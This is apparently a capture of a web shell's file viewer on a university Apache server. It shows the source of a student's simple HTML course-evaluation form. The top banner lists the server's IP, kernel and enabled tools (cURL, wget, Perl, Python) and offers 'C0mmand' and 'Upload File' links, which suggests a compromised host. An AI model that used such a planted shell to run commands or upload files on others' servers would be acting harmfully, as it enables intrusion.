Server IP : 172.16.15.8 / Your IP : 3.135.206.166 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jhtaylor/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- EVALUATE_insertForm.html Author: Jack Taylor Instructor: Dr. Wang Due: Sunday Apr. 21, 2024 --> <CENTER> <h2> Course Evaluation Form </h2> <hr> </CENTER> <Font color=blue size=4> <Form action=EVALUATE_insert.php method=post> <B> Gender: <BR> <INPUT type=radio name=gender value=Male > Male <BR> <INPUT type=radio name=gender value=Female> Female <BR> <P> Grade: <BR> <INPUT type=radio name=grade value=Freshman > Freshman <BR> <INPUT type=radio name=grade value=Sophmore> Sophmore <BR> <INPUT type=radio name=grade value=Junior > Junior <BR> <INPUT type=radio name=grade value=Senior> Senior <P> Course: <BR> <input type=text size=5 name=course> <P> Lecture Preparation: <BR> <INPUT type=radio name=LP value=0 > Poor <BR> <INPUT type=radio name=LP value=1> Average <BR> <INPUT type=radio name=LP value=2 > Good <P> Student Participation: <BR> <INPUT type=radio name=SP value=0 > Poor <BR> <INPUT type=radio name=SP value=1> Average <BR> <INPUT type=radio name=SP value=2 > Good <P> Overall Satisfaction: <BR> <INPUT type=radio name=OS value=0 > Poor <BR> <INPUT type=radio name=OS value=1> Average <BR> <INPUT type=radio name=OS value=2 > Good <P> <HR> <input type=submit value=Submit> <input type=reset value=Reset> <HR> </FORM> <A HREF= Assignment5.html> Home</A> | <A HREF= EVALUATE_display.php> Current Table</A> | <A HREF= index.html> Index</A>